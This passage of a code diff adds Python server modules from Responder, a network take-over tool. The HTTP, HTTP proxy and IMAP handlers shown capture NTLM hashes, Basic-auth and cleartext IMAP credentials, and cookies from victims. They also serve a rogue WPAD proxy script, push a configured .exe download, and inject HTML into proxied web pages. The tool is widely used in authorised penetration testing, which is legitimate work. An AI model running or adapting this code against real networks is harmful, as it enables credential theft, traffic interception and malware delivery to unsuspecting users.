||||||
|
'cleartext': Pass,
|
||||||
|
'fullhash': User + ':' + Pass
|
||||||
|
})
|
||||||
|
|
||||||
|
else:
|
||||||
|
Packet = FTPPacket(Code="502",Message="Command not implemented.")
|
||||||
|
self.request.send(str(Packet))
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
except Exception:
|
||||||
|
pass
|
||||||
285
servers/HTTP.py
Normal file
285
servers/HTTP.py
Normal file
@@ -0,0 +1,285 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
import struct
|
||||||
|
from SocketServer import BaseRequestHandler, StreamRequestHandler
|
||||||
|
from base64 import b64decode
|
||||||
|
from utils import *
|
||||||
|
|
||||||
|
from packets import NTLM_Challenge
|
||||||
|
from packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans
|
||||||
|
from packets import WPADScript, ServeExeFile, ServeHtmlFile
|
||||||
|
|
||||||
|
|
||||||
|
# Parse NTLMv1/v2 hash.
|
||||||
|
def ParseHTTPHash(data, client, module):
|
||||||
|
LMhashLen = struct.unpack('<H',data[12:14])[0]
|
||||||
|
LMhashOffset = struct.unpack('<H',data[16:18])[0]
|
||||||
|
LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
|
||||||
|
|
||||||
|
NthashLen = struct.unpack('<H',data[20:22])[0]
|
||||||
|
NthashOffset = struct.unpack('<H',data[24:26])[0]
|
||||||
|
NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
||||||
|
|
||||||
|
UserLen = struct.unpack('<H',data[36:38])[0]
|
||||||
|
UserOffset = struct.unpack('<H',data[40:42])[0]
|
||||||
|
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
|
||||||
|
|
||||||
|
if NthashLen == 24:
|
||||||
|
HostNameLen = struct.unpack('<H',data[46:48])[0]
|
||||||
|
HostNameOffset = struct.unpack('<H',data[48:50])[0]
|
||||||
|
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
|
||||||
|
WriteHash = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, settings.Config.NumChal)
|
||||||
|
SaveToDb({
|
||||||
|
'module': module,
|
||||||
|
'type': 'NTLMv1',
|
||||||
|
'client': client,
|
||||||
|
'host': HostName,
|
||||||
|
'user': User,
|
||||||
|
'hash': LMHash+":"+NTHash,
|
||||||
|
'fullhash': WriteHash,
|
||||||
|
})
|
||||||
|
|
||||||
|
if NthashLen > 24:
|
||||||
|
NthashLen = 64
|
||||||
|
DomainLen = struct.unpack('<H',data[28:30])[0]
|
||||||
|
DomainOffset = struct.unpack('<H',data[32:34])[0]
|
||||||
|
Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
|
||||||
|
HostNameLen = struct.unpack('<H',data[44:46])[0]
|
||||||
|
HostNameOffset = struct.unpack('<H',data[48:50])[0]
|
||||||
|
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
|
||||||
|
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, settings.Config.NumChal, NTHash[:32], NTHash[32:])
|
||||||
|
|
||||||
|
SaveToDb({
|
||||||
|
'module': module,
|
||||||
|
'type': 'NTLMv2',
|
||||||
|
'client': client,
|
||||||
|
'host': HostName,
|
||||||
|
'user': Domain + '\\' + User,
|
||||||
|
'hash': NTHash[:32] + ":" + NTHash[32:],
|
||||||
|
'fullhash': WriteHash,
|
||||||
|
})
|
||||||
|
|
||||||
|
def GrabCookie(data, host):
|
||||||
|
Cookie = re.search(r'(Cookie:*.\=*)[^\r\n]*', data)
|
||||||
|
|
||||||
|
if Cookie:
|
||||||
|
Cookie = Cookie.group(0).replace('Cookie: ', '')
|
||||||
|
if len(Cookie) > 1 and settings.Config.Verbose:
|
||||||
|
print text("[HTTP] Cookie : %s " % Cookie)
|
||||||
|
return Cookie
|
||||||
|
return False
|
||||||
|
|
||||||
|
def GrabHost(data, host):
|
||||||
|
Host = re.search(r'(Host:*.\=*)[^\r\n]*', data)
|
||||||
|
|
||||||
|
if Host:
|
||||||
|
Host = Host.group(0).replace('Host: ', '')
|
||||||
|
if settings.Config.Verbose:
|
||||||
|
print text("[HTTP] Host : %s " % color(Host, 3))
|
||||||
|
return Host
|
||||||
|
return False
|
||||||
|
|
||||||
|
def GrabReferer(data, host):
|
||||||
|
Referer = re.search(r'(Referer:*.\=*)[^\r\n]*', data)
|
||||||
|
|
||||||
|
if Referer:
|
||||||
|
Referer = Referer.group(0).replace('Referer: ', '')
|
||||||
|
if settings.Config.Verbose:
|
||||||
|
print text("[HTTP] Referer : %s " % color(Referer, 3))
|
||||||
|
return Referer
|
||||||
|
return False
|
||||||
|
|
||||||
|
def SpotFirefox(data):
|
||||||
|
UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
|
||||||
|
print text("[HTTP] %s" % color("User-Agent : "+UserAgent[0], 2))
|
||||||
|
if UserAgent:
|
||||||
|
IsFirefox = re.search('Firefox', UserAgent[0])
|
||||||
|
if IsFirefox:
|
||||||
|
print color("[WARNING]: Mozilla doesn't switch to fail-over proxies (as it should) when one's failing.", 1)
|
||||||
|
print color("[WARNING]: The current WPAD script will cause disruption on this host. Sending a dummy wpad script (DIRECT connect)", 1)
|
||||||
|
return True
|
||||||
|
else:
|
||||||
|
return False
|
||||||
|
|
||||||
|
def WpadCustom(data, client):
|
||||||
|
Wpad = re.search(r'(/wpad.dat|/*\.pac)', data)
|
||||||
|
if Wpad and SpotFirefox(data):
|
||||||
|
Buffer = WPADScript(Payload="function FindProxyForURL(url, host){return 'DIRECT';}")
|
||||||
|
Buffer.calculate()
|
||||||
|
return str(Buffer)
|
||||||
|
|
||||||
|
if Wpad and SpotFirefox(data) == False:
|
||||||
|
Buffer = WPADScript(Payload=settings.Config.WPAD_Script)
|
||||||
|
Buffer.calculate()
|
||||||
|
return str(Buffer)
|
||||||
|
return False
|
||||||
|
|
||||||
|
def ServeFile(Filename):
|
||||||
|
with open (Filename, "rb") as bk:
|
||||||
|
return bk.read()
|
||||||
|
|
||||||
|
def RespondWithFile(client, filename, dlname=None):
|
||||||
|
|
||||||
|
if filename.endswith('.exe'):
|
||||||
|
Buffer = ServeExeFile(Payload = ServeFile(filename), ContentDiFile=dlname)
|
||||||
|
else:
|
||||||
|
Buffer = ServeHtmlFile(Payload = ServeFile(filename))
|
||||||
|
|
||||||
|
Buffer.calculate()
|
||||||
|
print text("[HTTP] Sending file %s to %s" % (filename, client))
|
||||||
|
return str(Buffer)
|
||||||
|
|
||||||
|
def GrabURL(data, host):
|
||||||
|
GET = re.findall(r'(?<=GET )[^HTTP]*', data)
|
||||||
|
POST = re.findall(r'(?<=POST )[^HTTP]*', data)
|
||||||
|
POSTDATA = re.findall(r'(?<=\r\n\r\n)[^*]*', data)
|
||||||
|
|
||||||
|
if GET and settings.Config.Verbose:
|
||||||
|
print text("[HTTP] GET request from: %-15s URL: %s" % (host, color(''.join(GET), 5)))
|
||||||
|
|
||||||
|
if POST and settings.Config.Verbose:
|
||||||
|
print text("[HTTP] POST request from: %-15s URL: %s" % (host, color(''.join(POST), 5)))
|
||||||
|
|
||||||
|
if len(''.join(POSTDATA)) > 2:
|
||||||
|
print text("[HTTP] POST Data: %s" % ''.join(POSTDATA).strip())
|
||||||
|
|
||||||
|
# Handle HTTP packet sequence.
|
||||||
|
def PacketSequence(data, client):
|
||||||
|
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
|
||||||
|
Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)
|
||||||
|
|
||||||
|
# Serve the .exe if needed
|
||||||
|
if settings.Config.Serve_Always is True or (settings.Config.Serve_Exe is True and re.findall('.exe', data)):
|
||||||
|
return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName)
|
||||||
|
|
||||||
|
# Serve the custom HTML if needed
|
||||||
|
if settings.Config.Serve_Html:
|
||||||
|
return RespondWithFile(client, settings.Config.Html_Filename)
|
||||||
|
|
||||||
|
WPAD_Custom = WpadCustom(data, client)
|
||||||
|
|
||||||
|
if NTLM_Auth:
|
||||||
|
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
|
||||||
|
|
||||||
|
if Packet_NTLM == "\x01":
|
||||||
|
GrabURL(data, client)
|
||||||
|
GrabReferer(data, client)
|
||||||
|
GrabHost(data, client)
|
||||||
|
GrabCookie(data, client)
|
||||||
|
|
||||||
|
Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
|
||||||
|
Buffer.calculate()
|
||||||
|
|
||||||
|
Buffer_Ans = IIS_NTLM_Challenge_Ans()
|
||||||
|
Buffer_Ans.calculate(str(Buffer))
|
||||||
|
|
||||||
|
return str(Buffer_Ans)
|
||||||
|
|
||||||
|
if Packet_NTLM == "\x03":
|
||||||
|
NTLM_Auth = b64decode(''.join(NTLM_Auth))
|
||||||
|
ParseHTTPHash(NTLM_Auth, client, "HTTP")
|
||||||
|
|
||||||
|
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
|
||||||
|
print text("[HTTP] WPAD (auth) file sent to %s" % client)
|
||||||
|
|
||||||
|
return WPAD_Custom
|
||||||
|
else:
|
||||||
|
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
|
||||||
|
Buffer.calculate()
|
||||||
|
return str(Buffer)
|
||||||
|
|
||||||
|
elif Basic_Auth:
|
||||||
|
ClearText_Auth = b64decode(''.join(Basic_Auth))
|
||||||
|
|
||||||
|
GrabURL(data, client)
|
||||||
|
GrabReferer(data, client)
|
||||||
|
GrabHost(data, client)
|
||||||
|
GrabCookie(data, client)
|
||||||
|
|
||||||
|
SaveToDb({
|
||||||
|
'module': 'HTTP',
|
||||||
|
'type': 'Basic',
|
||||||
|
'client': client,
|
||||||
|
'user': ClearText_Auth.split(':')[0],
|
||||||
|
'cleartext': ClearText_Auth.split(':')[1],
|
||||||
|
})
|
||||||
|
|
||||||
|
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
|
||||||
|
if settings.Config.Verbose:
|
||||||
|
print text("[HTTP] WPAD (auth) file sent to %s" % client)
|
||||||
|
|
||||||
|
return WPAD_Custom
|
||||||
|
else:
|
||||||
|
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
|
||||||
|
Buffer.calculate()
|
||||||
|
return str(Buffer)
|
||||||
|
else:
|
||||||
|
if settings.Config.Basic:
|
||||||
|
Response = IIS_Basic_401_Ans()
|
||||||
|
if settings.Config.Verbose:
|
||||||
|
print text("[HTTP] Sending BASIC authentication request to %s" % client)
|
||||||
|
|
||||||
|
else:
|
||||||
|
Response = IIS_Auth_401_Ans()
|
||||||
|
if settings.Config.Verbose:
|
||||||
|
print text("[HTTP] Sending NTLM authentication request to %s" % client)
|
||||||
|
|
||||||
|
return str(Response)
|
||||||
|
|
||||||
|
# HTTP Server class
|
||||||
|
class HTTP(BaseRequestHandler):
|
||||||
|
def handle(self):
|
||||||
|
try:
|
||||||
|
self.request.settimeout(1)
|
||||||
|
data = self.request.recv(8092)
|
||||||
|
Buffer = WpadCustom(data, self.client_address[0])
|
||||||
|
|
||||||
|
if Buffer and settings.Config.Force_WPAD_Auth == False:
|
||||||
|
self.request.send(Buffer)
|
||||||
|
if settings.Config.Verbose:
|
||||||
|
print text("[HTTP] WPAD (no auth) file sent to %s" % self.client_address[0])
|
||||||
|
|
||||||
|
else:
|
||||||
|
Buffer = PacketSequence(data,self.client_address[0])
|
||||||
|
self.request.send(Buffer)
|
||||||
|
except socket.error:
|
||||||
|
pass
|
||||||
|
|
||||||
|
# HTTPS Server class
|
||||||
|
class HTTPS(StreamRequestHandler):
|
||||||
|
def setup(self):
|
||||||
|
self.exchange = self.request
|
||||||
|
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
|
||||||
|
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
|
||||||
|
|
||||||
|
def handle(self):
|
||||||
|
try:
|
||||||
|
data = self.exchange.recv(8092)
|
||||||
|
self.exchange.settimeout(0.5)
|
||||||
|
Buffer = WpadCustom(data,self.client_address[0])
|
||||||
|
|
||||||
|
if Buffer and settings.Config.Force_WPAD_Auth == False:
|
||||||
|
self.exchange.send(Buffer)
|
||||||
|
if settings.Config.Verbose:
|
||||||
|
print text("[HTTPS] WPAD (no auth) file sent to %s" % self.client_address[0])
|
||||||
|
|
||||||
|
else:
|
||||||
|
Buffer = PacketSequence(data,self.client_address[0])
|
||||||
|
self.exchange.send(Buffer)
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
347
servers/HTTP_Proxy.py
Normal file
347
servers/HTTP_Proxy.py
Normal file
@@ -0,0 +1,347 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
import urlparse
|
||||||
|
import select
|
||||||
|
import zlib
|
||||||
|
import BaseHTTPServer
|
||||||
|
|
||||||
|
from servers.HTTP import RespondWithFile
|
||||||
|
from utils import *
|
||||||
|
|
||||||
|
IgnoredDomains = [ 'crl.comodoca.com', 'crl.usertrust.com', 'ocsp.comodoca.com', 'ocsp.usertrust.com', 'www.download.windowsupdate.com', 'crl.microsoft.com' ]
|
||||||
|
|
||||||
|
def InjectData(data, client, req_uri):
|
||||||
|
|
||||||
|
# Serve the .exe if needed
|
||||||
|
if settings.Config.Serve_Always:
|
||||||
|
return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName)
|
||||||
|
|
||||||
|
# Serve the .exe if needed and client requested a .exe
|
||||||
|
if settings.Config.Serve_Exe == True and req_uri.endswith('.exe'):
|
||||||
|
return RespondWithFile(client, settings.Config.Exe_Filename, os.path.basename(req_uri))
|
||||||
|
|
||||||
|
if len(data.split('\r\n\r\n')) > 1:
|
||||||
|
try:
|
||||||
|
Headers, Content = data.split('\r\n\r\n')
|
||||||
|
except:
|
||||||
|
return data
|
||||||
|
|
||||||
|
RedirectCodes = ['HTTP/1.1 300', 'HTTP/1.1 301', 'HTTP/1.1 302', 'HTTP/1.1 303', 'HTTP/1.1 304', 'HTTP/1.1 305', 'HTTP/1.1 306', 'HTTP/1.1 307']
|
||||||
|
if set(RedirectCodes) & set(Headers):
|
||||||
|
return data
|
||||||
|
|
||||||
|
if "content-encoding: gzip" in Headers.lower():
|
||||||
|
Content = zlib.decompress(Content, 16+zlib.MAX_WBITS)
|
||||||
|
|
||||||
|
if "content-type: text/html" in Headers.lower():
|
||||||
|
if settings.Config.Serve_Html: # Serve the custom HTML if needed
|
||||||
|
return RespondWithFile(client, settings.Config.Html_Filename)
|
||||||
|
|
||||||
|
Len = ''.join(re.findall(r'(?<=Content-Length: )[^\r\n]*', Headers))
|
||||||
|
HasBody = re.findall(r'(<body[^>]*>)', Content)
|
||||||
|
|
||||||
|
if HasBody and len(settings.Config.HtmlToInject) > 2:
|
||||||
|
if settings.Config.Verbose:
|
||||||
|
print text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HtmlToInject, 3, 1))
|
||||||
|
|
||||||
|
Content = Content.replace(HasBody[0], '%s\n%s' % (HasBody[0], settings.Config.HtmlToInject))
|
||||||
|
|
||||||
|
if "content-encoding: gzip" in Headers.lower():
|
||||||
|
Content = zlib.compress(Content)
|
||||||
|
|
||||||
|
Headers = Headers.replace("Content-Length: "+Len, "Content-Length: "+ str(len(Content)))
|
||||||
|
data = Headers +'\r\n\r\n'+ Content
|
||||||
|
else:
|
||||||
|
if settings.Config.Verbose:
|
||||||
|
print text("[PROXY] Returning unmodified HTTP response")
|
||||||
|
return data
|
||||||
|
|
||||||
|
class ProxySock:
|
||||||
|
def __init__(self, socket, proxy_host, proxy_port) :
|
||||||
|
|
||||||
|
# First, use the socket, without any change
|
||||||
|
self.socket = socket
|
||||||
|
|
||||||
|
# Create socket (use real one)
|
||||||
|
self.proxy_host = proxy_host
|
||||||
|
self.proxy_port = proxy_port
|
||||||
|
|
||||||
|
# Copy attributes
|
||||||
|
self.family = socket.family
|
||||||
|
self.type = socket.type
|
||||||
|
self.proto = socket.proto
|
||||||
|
|
||||||
|
def connect(self, address) :
|
||||||
|
|
||||||
|
# Store the real remote adress
|
||||||
|
self.host, self.port = address
|
||||||
|
|
||||||
|
# Try to connect to the proxy
|
||||||
|
for (family, socktype, proto, canonname, sockaddr) in socket.getaddrinfo(
|
||||||
|
self.proxy_host,
|
||||||
|
self.proxy_port,
|
||||||
|
0, 0, socket.SOL_TCP):
|
||||||
|
try:
|
||||||
|
# Replace the socket by a connection to the proxy
|
||||||
|
self.socket = socket.socket(family, socktype, proto)
|
||||||
|
self.socket.connect(sockaddr)
|
||||||
|
except socket.error, msg:
|
||||||
|
if self.socket:
|
||||||
|
self.socket.close()
|
||||||
|
self.socket = None
|
||||||
|
continue
|
||||||
|
break
|
||||||
|
if not self.socket :
|
||||||
|
raise socket.error, msg
|
||||||
|
|
||||||
|
# Ask him to create a tunnel connection to the target host/port
|
||||||
|
self.socket.send(
|
||||||
|
("CONNECT %s:%d HTTP/1.1\r\n" +
|
||||||
|
"Host: %s:%d\r\n\r\n") % (self.host, self.port, self.host, self.port))
|
||||||
|
|
||||||
|
# Get the response
|
||||||
|
resp = self.socket.recv(4096)
|
||||||
|
|
||||||
|
# Parse the response
|
||||||
|
parts = resp.split()
|
||||||
|
|
||||||
|
# Not 200 ?
|
||||||
|
if parts[1] != "200":
|
||||||
|
print color("[!] Error response from upstream proxy: %s" % resp, 1)
|
||||||
|
pass
|
||||||
|
|
||||||
|
# Wrap all methods of inner socket, without any change
|
||||||
|
def accept(self) :
|
||||||
|
return self.socket.accept()
|
||||||
|
|
||||||
|
def bind(self, *args) :
|
||||||
|
return self.socket.bind(*args)
|
||||||
|
|
||||||
|
def close(self) :
|
||||||
|
return self.socket.close()
|
||||||
|
|
||||||
|
def fileno(self) :
|
||||||
|
return self.socket.fileno()
|
||||||
|
|
||||||
|
def getsockname(self) :
|
||||||
|
return self.socket.getsockname()
|
||||||
|
|
||||||
|
def getsockopt(self, *args) :
|
||||||
|
return self.socket.getsockopt(*args)
|
||||||
|
|
||||||
|
def listen(self, *args) :
|
||||||
|
return self.socket.listen(*args)
|
||||||
|
|
||||||
|
def makefile(self, *args) :
|
||||||
|
return self.socket.makefile(*args)
|
||||||
|
|
||||||
|
def recv(self, *args) :
|
||||||
|
return self.socket.recv(*args)
|
||||||
|
|
||||||
|
def recvfrom(self, *args) :
|
||||||
|
return self.socket.recvfrom(*args)
|
||||||
|
|
||||||
|
def recvfrom_into(self, *args) :
|
||||||
|
return self.socket.recvfrom_into(*args)
|
||||||
|
|
||||||
|
def recv_into(self, *args) :
|
||||||
|
return self.socket.recv_into(buffer, *args)
|
||||||
|
|
||||||
|
def send(self, *args) :
|
||||||
|
try: return self.socket.send(*args)
|
||||||
|
except: pass
|
||||||
|
|
||||||
|
def sendall(self, *args) :
|
||||||
|
return self.socket.sendall(*args)
|
||||||
|
|
||||||
|
def sendto(self, *args) :
|
||||||
|
return self.socket.sendto(*args)
|
||||||
|
|
||||||
|
def setblocking(self, *args) :
|
||||||
|
return self.socket.setblocking(*args)
|
||||||
|
|
||||||
|
def settimeout(self, *args) :
|
||||||
|
return self.socket.settimeout(*args)
|
||||||
|
|
||||||
|
def gettimeout(self) :
|
||||||
|
return self.socket.gettimeout()
|
||||||
|
|
||||||
|
def setsockopt(self, *args):
|
||||||
|
return self.socket.setsockopt(*args)
|
||||||
|
|
||||||
|
def shutdown(self, *args):
|
||||||
|
return self.socket.shutdown(*args)
|
||||||
|
|
||||||
|
# Return the (host, port) of the actual target, not the proxy gateway
|
||||||
|
def getpeername(self) :
|
||||||
|
return self.host, self.port
|
||||||
|
|
||||||
|
# Inspired from Tiny HTTP proxy, original work: SUZUKI Hisao.
|
||||||
|
class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
|
||||||
|
__base = BaseHTTPServer.BaseHTTPRequestHandler
|
||||||
|
__base_handle = __base.handle
|
||||||
|
|
||||||
|
rbufsize = 0
|
||||||
|
|
||||||
|
def handle(self):
|
||||||
|
(ip, port) = self.client_address
|
||||||
|
if settings.Config.Verbose:
|
||||||
|
print text("[PROXY] Received connection from %s" % self.client_address[0])
|
||||||
|
self.__base_handle()
|
||||||
|
|
||||||
|
def _connect_to(self, netloc, soc):
|
||||||
|
i = netloc.find(':')
|
||||||
|
if i >= 0:
|
||||||
|
host_port = netloc[:i], int(netloc[i+1:])
|
||||||
|
else:
|
||||||
|
host_port = netloc, 80
|
||||||
|
try: soc.connect(host_port)
|
||||||
|
except socket.error, arg:
|
||||||
|
try: msg = arg[1]
|
||||||
|
except: msg = arg
|
||||||
|
self.send_error(404, msg)
|
||||||
|
return 0
|
||||||
|
return 1
|
||||||
|
|
||||||
|
def socket_proxy(self, af, fam):
|
||||||
|
Proxy = settings.Config.Upstream_Proxy
|
||||||
|
Proxy = Proxy.rstrip('/').replace('http://', '').replace('https://', '')
|
||||||
|
Proxy = Proxy.split(':')
|
||||||
|
|
||||||
|
try: Proxy = (Proxy[0], int(Proxy[1]))
|
||||||
|
except: Proxy = (Proxy[0], 8080)
|
||||||
|
|
||||||
|
soc = socket.socket(af, fam)
|
||||||
|
return ProxySock(soc, Proxy[0], Proxy[1])
|
||||||
|
|
||||||
|
def do_CONNECT(self):
|
||||||
|
|
||||||
|
if settings.Config.Upstream_Proxy:
|
||||||
|
soc = self.socket_proxy(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
else:
|
||||||
|
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
|
||||||
|
try:
|
||||||
|
if self._connect_to(self.path, soc):
|
||||||
|
self.wfile.write(self.protocol_version +" 200 Connection established\r\n")
|
||||||
|
self.wfile.write("Proxy-agent: %s\r\n" % self.version_string())
|
||||||
|
self.wfile.write("\r\n")
|
||||||
|
try:
|
||||||
|
self._read_write(soc, 300)
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
finally:
|
||||||
|
soc.close()
|
||||||
|
self.connection.close()
|
||||||
|
|
||||||
|
def do_GET(self):
|
||||||
|
(scm, netloc, path, params, query, fragment) = urlparse.urlparse(self.path, 'http')
|
||||||
|
|
||||||
|
if netloc in IgnoredDomains:
|
||||||
|
#self.send_error(200, "OK")
|
||||||
|
return
|
||||||
|
|
||||||
|
if scm not in 'http' or fragment or not netloc:
|
||||||
|
self.send_error(400, "bad url %s" % self.path)
|
||||||
|
return
|
||||||
|
|
||||||
|
if settings.Config.Upstream_Proxy:
|
||||||
|
soc = self.socket_proxy(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
else:
|
||||||
|
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
|
||||||
|
try:
|
||||||
|
URL_Unparse = urlparse.urlunparse(('', '', path, params, query, ''))
|
||||||
|
|
||||||
|
if self._connect_to(netloc, soc):
|
||||||
|
soc.send("%s %s %s\r\n" % (self.command, URL_Unparse, self.request_version))
|
||||||
|
|
||||||
|
Cookie = self.headers['Cookie'] if "Cookie" in self.headers else ''
|
||||||
|
|
||||||
|
if settings.Config.Verbose:
|
||||||
|
print text("[PROXY] Client : %s" % color(self.client_address[0], 3))
|
||||||
|
print text("[PROXY] Requested URL : %s" % color(self.path, 3))
|
||||||
|
print text("[PROXY] Cookie : %s" % Cookie)
|
||||||
|
|
||||||
|
self.headers['Connection'] = 'close'
|
||||||
|
del self.headers['Proxy-Connection']
|
||||||
|
del self.headers['If-Range']
|
||||||
|
del self.headers['Range']
|
||||||
|
|
||||||
|
for k, v in self.headers.items():
|
||||||
|
soc.send("%s: %s\r\n" % (k.title(), v))
|
||||||
|
soc.send("\r\n")
|
||||||
|
|
||||||
|
try:
|
||||||
|
self._read_write(soc, netloc)
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
finally:
|
||||||
|
soc.close()
|
||||||
|
self.connection.close()
|
||||||
|
|
||||||
|
def _read_write(self, soc, netloc='', max_idling=30):
|
||||||
|
iw = [self.connection, soc]
|
||||||
|
ow = []
|
||||||
|
count = 0
|
||||||
|
while 1:
|
||||||
|
count += 1
|
||||||
|
(ins, _, exs) = select.select(iw, ow, iw, 1)
|
||||||
|
if exs:
|
||||||
|
break
|
||||||
|
if ins:
|
||||||
|
for i in ins:
|
||||||
|
if i is soc:
|
||||||
|
out = self.connection
|
||||||
|
try:
|
||||||
|
data = i.recv(4096)
|
||||||
|
if len(data) > 1:
|
||||||
|
data = InjectData(data, self.client_address[0], self.path)
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
else:
|
||||||
|
out = soc
|
||||||
|
try:
|
||||||
|
data = i.recv(4096)
|
||||||
|
|
||||||
|
if self.command == "POST" and settings.Config.Verbose:
|
||||||
|
print text("[PROXY] POST Data : %s" % data)
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
if data:
|
||||||
|
try:
|
||||||
|
out.send(data)
|
||||||
|
count = 0
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
if count == max_idling:
|
||||||
|
break
|
||||||
|
return None
|
||||||
|
|
||||||
|
|
||||||
|
do_HEAD = do_GET
|
||||||
|
do_POST = do_GET
|
||||||
|
do_PUT = do_GET
|
||||||
|
do_DELETE=do_GET
|
||||||
|
|
||||||
49
servers/IMAP.py
Normal file
49
servers/IMAP.py
Normal file
@@ -0,0 +1,49 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
# (at your option) any later version.
|
||||||
|
#
|
||||||
|
# This program is distributed in the hope that it will be useful,
|
||||||
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
# GNU General Public License for more details.
|
||||||
|
#
|
||||||
|
# You should have received a copy of the GNU General Public License
|
||||||
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
from utils import *
|
||||||
|
from SocketServer import BaseRequestHandler
|
||||||
|
from packets import IMAPGreeting, IMAPCapability, IMAPCapabilityEnd
|
||||||
|
|
||||||
|
class IMAP(BaseRequestHandler):
|
||||||
|
def handle(self):
|
||||||
|
try:
|
||||||
|
self.request.send(str(IMAPGreeting()))
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
if data[5:15] == "CAPABILITY":
|
||||||
|
RequestTag = data[0:4]
|
||||||
|
self.request.send(str(IMAPCapability()))
|
||||||
|
self.request.send(str(IMAPCapabilityEnd(Tag=RequestTag)))
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
|
if data[5:10] == "LOGIN":
|
||||||
|
Credentials = data[10:].strip()
|
||||||
|
|
||||||
|
SaveToDb({
|
||||||
|
'module': 'IMAP',
|
||||||
|
'type': 'Cleartext',
|
||||||
|
'client': self.client_address[0],
|
||||||
|
'user': Credentials[0],
|
||||||
|
'cleartext': Credentials[1],
|
||||||
|
'fullhash': Credentials[0]+":"+Credentials[1],
|
||||||
|
})
|
||||||
|
|
||||||
|
## FIXME: Close connection properly
|
||||||
|
## self.request.send(str(ditchthisconnection()))
|
||||||
|
## data = self.request.recv(1024)
|
||||||
|
except Exception:
|
||||||
|
pass
|
||||||
139
servers/Kerberos.py
Normal file
139
servers/Kerberos.py
Normal file
@@ -0,0 +1,139 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# This file is part of Responder, a network take-over set of tools
|
||||||
|
# created and maintained by Laurent Gaffie.
|
||||||
|
# email: laurent.gaffie@gmail.com
|
||||||
|
# This program is free software: you can redistribute it and/or modify
|
||||||
|
# it under the terms of the GNU General Public License as published by
|
||||||
|
# the Free Software Foundation, either version 3 of the License, or
|
||||||
|
